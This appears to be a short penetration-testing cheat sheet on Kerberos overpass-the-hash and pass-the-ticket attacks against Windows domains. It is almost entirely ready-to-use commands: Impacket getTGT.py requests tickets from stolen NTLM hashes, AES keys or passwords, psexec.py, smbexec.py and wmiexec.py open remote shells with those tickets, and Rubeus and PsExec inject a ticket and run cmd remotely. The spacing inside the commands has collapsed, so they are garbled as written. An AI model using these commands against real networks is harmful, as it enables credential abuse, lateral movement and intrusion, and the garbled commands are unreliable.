# Request the TGT with hashpythongetTGT.py<domain_name>/<user_name>-hashes [lm_hash]:<ntlm_hash># Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)pythongetTGT.py<domain_name>/<user_name>-aesKey<aes_key># Request the TGT with passwordpythongetTGT.py<domain_name>/<user_name>:[password]# Set the TGT for impacket useexport KRB5CCNAME=<TGT_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.pyrastalabs.local/jack@10.10.10.1-k-no-passpythonsmbexec.pyrastalabs.local/jack@10.10.10.1-k-no-passpythonwmiexec.pyrastalabs.local/jack@10.10.10.1-k-no-pass
# Ask and inject the ticket.\Rubeus.exeasktgt/domain:<domain_name>/user:<user_name>/rc4:<ntlm_hash>/ptt# Execute a cmd in the remote machine.\PsExec.exe-accepteula \\<remote_hostname>cmd
Impacket’s psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file for Authentication. It can be obtained via Impacket’s GetST.py